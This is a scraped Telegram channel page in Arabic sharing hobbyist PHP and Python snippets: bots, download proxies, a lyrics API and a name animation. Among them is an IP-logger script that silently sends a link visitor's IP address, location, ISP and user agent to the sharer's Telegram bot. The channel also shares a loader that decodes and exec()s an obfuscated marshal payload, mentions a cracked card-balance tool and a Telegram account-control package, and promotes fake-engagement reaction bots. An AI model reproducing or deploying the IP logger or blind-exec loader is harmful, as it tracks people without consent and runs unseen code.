ملفات Pydroid+php
3.52K subscribers
60 photos
20 videos
41 files
165 links
Download Telegram
P.php
6 KB
كود لعبة الروليت. جديد

@LL_php
1
<?php
$admin = 'ايدي';
$token = 'توكن';
function bot($method, $datas = [])
{
global $token;
$url = "https://api.telegram.org/bot" . $token . "/" . $method;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $datas);
$res = curl_exec($ch);
if (curl_error($ch)) {
var_dump(curl_error($ch));
} else {
return json_decode($res);
}
}

$update = json_decode(file_get_contents('php://input'));
$message = $update->message;
$mid = $message->message_id;
$type = $message->chat->type;
$text = $message->text;
$cid = $message->chat->id;
$uid = $message->from->id;
$gname = $message->chat->title;
$name = $message->from->first_name;
$repid = $message->reply_to_message->from->id;
$repname = $message->reply_to_message->from->first_name;
$username = $message->from->username;
$cusername = $message->chat->username;
$repmid = $message->reply_to_message->message_id;
$data = $update->callback_query->data;
$cmid = $update->callback_query->message->message_id;
$ccid = $update->callback_query->message->chat->id;
$cuid = $update->callback_query->message->from->id;
$qid = $update->callback_query->id;
$ctext = $update->callback_query->message->text;
$callfrid = $update->callback_query->from->id;
$callfname = $update->callback_query->from->first_name;
$calltitle = $update->callback_query->message->chat->title;
$calluser = $update->callback_query->message->chat->username;
$channel = $update->channel_post;
$channel_text = $channel->text;
$channel_mid = $channel->message_id;
$channel_id = $channel->chat->id;
$channel_user = $channel->chat->username;
$chanel_doc = $channel->document;
$chanel_vid = $channel->video;
$chanel_mus = $channel->audio;
$afile_id = $channel_mus->file_id;
$chanel_voi = $channel->voice;
$chanel_gif = $channel->animation;
$chanel_fot = $channel->photo;
$caption = $channel->caption;

$message = $update->message;
$tx = $message->text;
$cid = $message->chat->id;
$uid = $message->from->id;
$ty = $message->chat->type;
$name = $message->from->first_name;
$mid = $message->message_id;
$channel = $update->channel_post;
$channel_text = $channel->text;
$channel_mid = $channel->message_id;
$channel_id = $channel->chat->id;
$emolar = '🔥';
mkdir("like");

if ($text == "/start") {
bot('SendMessage', [
'chat_id' => $cid,
'text' => "👋مرحبًا <b>$name</b>",
'parse_mode' => 'html'
]);
}

if ($channel_text) {
$tokenn = uniqid("true");

bot('editMessageReplyMarkup', [
'chat_id' => $channel_id,
'message_id' => $channel_mid,
'inline_query_id' => $qid,
'reply_markup' => json_encode([
'inline_keyboard' => [
[['text' => "$emolar", 'callback_data' => "$tokenn=🔥"]],
],
]),
]);
}

if (mb_stripos($data, "=") !== false) {
$ex = explode("=", $data);
$calltok = $ex[0];
$emoj = $ex[1];
$mylike = file_get_contents("like/$calltok.dat");

if (mb_stripos($mylike, "$callfrid") !== false) {
bot('answerCallbackQuery', [
'callback_query_id' => $qid,
'text' => "عذرًا، قد قمت بإعطاء صوت من قبل!",
'show_alert' => true,
]);
} else {
file_put_contents("like/$calltok.dat", "$mylike$callfrid=$emoj");
$value = file_get_contents("like/$calltok.dat");
$lik = substr_count($value, "🔥");

bot('editMessageReplyMarkup', [
'chat_id' => $ccid,
'message_id' => $cmid,
'inline_query_id' => $qid,
'reply_markup' => json_encode([
'inline_keyboard' => [
[['text' => "$emolar $lik", 'callback_data' => "$calltok=🔥"]],
],
]),
]);
}
}

if (mb_stripos($data, "$calltok=🔥") !== false) {
bot('answerCallbackQuery', [
'callback_query_id' => $qid,
'text' => "🔥",
'show_alert' => false,
]);
}

كود يضيف زر تصويت ع كل منشور جديد بالقناة .

@LL_php
👍3🔥3
<?php
$text = $_GET['text'];
$birth_date = new DateTime($text);
$current_date = new DateTime();
$diff = $birth_date->diff($current_date);
$years = $diff->y;
$months = $diff->y * 12 + $diff->m;
$weeks = floor($diff->days / 7);
$days = $diff->days;
$hours = $diff->h + ($diff->days * 24);
$minutes = $diff->i + ($diff->days * 24 * 60);
$seconds = $diff->s + ($diff->days * 24 * 60 * 60);

$result = [
'منذ ميلادك',
'العمر: ' . $years,
'الشهور: ' . $months,
'الأسابيع: ' . $weeks,
'الأيام: ' . $days,
'الساعات: ' . $hours,
'الدقائق: ' . $minutes,
'الثواني: ' . $seconds
];

header('Content-type: application/json');
echo json_encode($result);
?>

@LL_php
1🔥1
if($text == "/start"){
$getlink = file_get_contents("https://api.telegram.org/bot".$token."/createChatInviteLink?chat_id=".$chanel_id."member_limit=1");
$argon = json_decode($getlink, true);
$getlinkde = $argon['result']['invite_link'];

bot('SendMessage', [
'chat_id' => $cid,
'text' => "تم إنشاء الرابط بنجاح! \n $getlinkde",
]);
}
?>
@LL_php
🔥3
بوت الافتارات ينزل اي صورة تريدها بس ادخل ابحث عليها
@FTRTTBOT
🔥1
<?php
ob_start();
error_reporting(0);
header('Content-Type: application/json');

function info($id){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://getindevice.com/wp-json/aio-dl/video-data/");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Origin: https://getindevice.com/',
'Referer: https://getindevice.com/',
'User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36'));
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".$id);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

return $response;
}

$res = info($_GET["url"]);
$arr = json_decode($res,1);

echo json_encode($arr, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES);

Api تحميل من الانستقرام
@LL_php
🔥31👎1
m.py
6.5 KB
اداة تشوف شكد رصيد بالفيزة + مو مالتي فقط فكيت التشفير
@LL_php
👍1
import base64
import zlib
import marshal


encrypted_value = b'==الكود المشفر هنا خلي'


reversed_text = encrypted_value[::-1]


decoded_text = base64.b64decode(reversed_text)


uncompressed_text = zlib.decompress(decoded_text)


try:
original_code = uncompressed_text.decode('latin-1')
print(original_code)
except UnicodeDecodeError:
print("!!")


executed_code = marshal.loads(uncompressed_text)
exec(executed_code)


اداة فك تشفير.
@LL_php
👍2
يعني شبيكم ماشايفين $ رحمه للكعبه قفاصه شكد بتلي اكثرهم قفاصة جماعة الاثباتات شيسوي يراسل روحه من حساب ثاني 🤣

جماعة بوتات الرشق : قفاصه

جماعة بوتات التجميع : قفاصه

جماعة الاستضافات : قفاصه

جماعة السيرفرات : قفاصه

اكيد مو كلهم بس نصهم
👍2🤣2
<?php

header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: GET, OPTIONS");
header("Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept");
$song_name = isset($_GET['song']) ? $_GET['song'] : '';
$external_api_url = "https://lyrist.vercel.app/api/$song_name";
$response = file_get_contents($external_api_url);
if ($response !== false) {

    header('Content-Type: application/json');
    echo $response;
} else {

    echo json_encode(['error' => 'غير قادر على جلب البيانات من الAPI الخارجي']);
}
?>


Api ينطيك كلمات الاغنية

api.php?song=اسم_الأغنية

@LL_php
1👏1
<?php
ob_start();
error_reporting(0);
header('Content-Type: application/json');

function info($id){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://downloaderr.com/system/action.php");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Origin: https://downloaderr.com/',
'Referer: https://downloaderr.com/',
'User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36'));
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".$id);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

return $response;
}

$res = info($_GET["url"]);
$arr = json_decode($res,1);

echo json_encode($arr, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES);

?>
تحميل من اليوتيوب صوتيات مقاطع كلشي.

@LL_php
🔥2👍1
<?php
session_start();
$dev = "@LL_php";
$str = $_GET['id'];
if($_GET["id"]){
$a = base64_decode($str);
$ip = $_SERVER["REMOTE_ADDR"];
$_SESSION["ip"] = $ip;
$api_agent = $_SERVER['HTTP_USER_AGENT'];
$api_info = json_decode(file_get_contents("http://ip-api.com/json/" . $ip));
$api_country = $api_info->country;
$api_city = $api_info->city;
$api_isp = $api_info->isp;
$api_id = $a;
$api_token = 'توكن بوتك';
$api_text = '*
🔰︙الايبي IP: ' . $ip . '*
*👾 — — — — — — — — — —*
*🌐︙الدولة: ' . $api_country . '*
*🌐︙المدينة: '. $api_city . '*
*🌐︙مزود الخدمة: ' . $api_isp . '*
*👾 — — — — — — — — — —*
*🔰︙المطور: ' . $dev . '*

`🌐︙UserAgent: ' . $api_agent . '```';
$api_data = [
'chat_id'=> $api_id,
'text'=> $api_text,
'parse_mode'=> 'markdown'
];

$response = file_get_contents("https://api.telegram.org/bot" . $api_token . "/sendMessage?" . http_build_query($api_data));


if ($response){
echo 'تم إرسال الرسالة بنجاح!';
} else {
echo 'حدث خطأ، يرجى المحاولة مرة أخرى.';
}
} else {
echo "يرجى إدخال رقم المعرف!";
}
?>

@LL_php
👍1
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Asilbek Coder</title>
<link rel="icon" href="https://cdn4.cdn-telegram.org/file/lA7oUA1V5yOuFD1Pmf98LgqJ1LaRVrdvbMGDPR00APU1PCqIK5g3Te7O2PMh54M7qVNu2oDzl7l-ZkAwa3iL52JYaD2Tghm7vgmNU37Z-FwobJpNX5EP8na3XoWMefNwbEbakGzYz6mRxN1F5-1tAgKH2Dfb4GVQtSubgtUE53ur7YKsNU-6fvSvx3GaDb5NG1e5AurNErZrdyux6mTKFWfT-5YvJycHSkU-oD8Ls5XbItBbBGGWvr6nblyhuMZ1HJ3_cx-zj9DDHTaUaDzjvMZKRjvqIOsPWZg7Mkkpr_1ZYjBiHyph8xDBaZnvSpGE7jTbo4AFLW8Xukwj73mCzw.jpg">
</head>

<body style="direction: rtl; text-align: center;">
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: sans-serif;
}

body {
background: #07252d;
}

.u {
padding-left: 30px;
}

.box-1 {
position: relative;
width: 90%;
margin: auto;
margin-top: 150px;
}

.box-1 h1 {
width: 100%;
text-align: center;
color: #0e3742;
}

.box-1 h1 span {
width: 100%;
font-size: 90px;
}

h1 span {
animation: animate 6s linear infinite;
transition: .4s;
}

h1 span:nth-child(even) {
animation-delay: .5s;
}

@keyframes animate {
0%, 8%, 18%, 20%, 50.1%, 60%, 65.1%, 80%, 90.1%, 92% {
color: #0e3742;
text-shadow: none;
}

8.1%, 18.1%, 20.1%, 50%, 30%, 60.1%, 65%, 80.1%, 90%, 92.1%, 100% {
color: #fff;
text-shadow: 0 0 10px #03bcf4, 0 0 20px #03bcf4, 0 0 40px #03bcf4, 0 0 80px #03bcf4, 0 0 160px #03bcf4, 0 0 400px #03bcf4;
}
}
</style>

<div class="box-1">
<h1>
<?php
if (isset($_GET['text'])) {
$text = $_GET["text"];
} else {
$text = "@LL_php";
}
for ($i = 0; $i < mb_strlen($text, 'UTF-8'); $i++) {
$text2 = mb_substr($text, $i, 1, 'UTF-8');
echo "<span>$text2</span>";
}
?>
</h1>
</div>
</body>

</html>


كود مرتب يسويلك متحركة ع اي اسم ونص يدعم العربية او اي لغة.

@LL_php
👍1
import requests

def search_github_repositories(name):
url_aps = f"https://api.github.com/search/repositories?q={name}&type=public"
response = requests.get(url_aps)

if response.status_code == 200:
repos = response.json()["items"]
return repos
else:
return None

if name == "main":
tool_input = input("Enter the name of the repository: ")
found_repos = search_github_repositories(tool_input)

if found_repos:
print(f"Found {len(found_repos)} repositories:")
for repo in found_repos:
name = repo["full_name"]
url = repo["html_url"]
print(f"Name: {name} ")
print(f"URL: {url}")
print("---------------")
else:
print("No repositories found. Check the name.")

كود يبحث عن مستودعات github

@LL_php
رمضان يهلّ علينا وعليكم بالبركات 
نسأل الله يتقبل صيامكم وقيامكم
ويملأ أيامكم بالفرح والسعادة
(رمضان كريم 🤍🌜 ) .
7
التحكم بحسابات التلكرام.zip
20.5 KB
التحكم بحسابات التلكرام
@LL_php
🔥2🫡1
شني هاي التلكرام بي حقوق الطبع والنشر
👍4🤨4❤‍🔥11
اكو مواقع عربية من تشحن بيهن يسحبون كل رصيدك بالموقع اذا تريد تشحن موقع رشق اشحن موقع اجنبي ورخيص جدا هاي المواقع العربيه مربوطه بالاجنبيه اكو مواقع عراقيه هم تشحن بيهن يسحبون رصيدك بالموقع يصفرونه ويكلولك مشكلة وهاي وجذب هاي تقفيص ال 5ك بمواقع العربيه ب 5$ وبمواقع الاجنبيه 30ك و 20ك ب 5$
👍3🥰31
بوت اضافة رد فعل 😭
المعرف : @Reaction_14bot

بوت اضافة رد فعل 🦄
المعرف :@Reaction_13bot

بوت اضافة رد فعل 🏆

المعرف : @Reaction_9bot

بوت اضافة رد فعل 🆒

المعرف :@Reaction_8bot

بوت اضافة رد فعل ⚡️

المعرف : @Reaction_7bot

بوت اضافة رد فعل 🍓

المعرف : @Reaction_6bot

بوت اضافة رد فعل ❤️

المعرف : @Reaction_5bot

بوت اضافة رد فعل 🙈

المعرف : @Reaction_3bot

بوت اضافة رد فعل 🔥

المعرف : @Reaction_2bot

بوت اضافة رد فعل 💋

المعرف : @Reaction_1bot

اضافة رد فعل ❤️‍🔥

معرف البوت : @Reaction_15bot

سويتلكم بوتات تضيف تفاعلات ع اي منشور بقناتكم يعني ترفع هذني ال 10 بوتات مسول راح تضيفلكم 10تفاعلات اول شخص بتلي يسوي الفكرة مشاركة للبوتات 🙈.
👍4❤‍🔥22🥰2😁1🤣1🫡1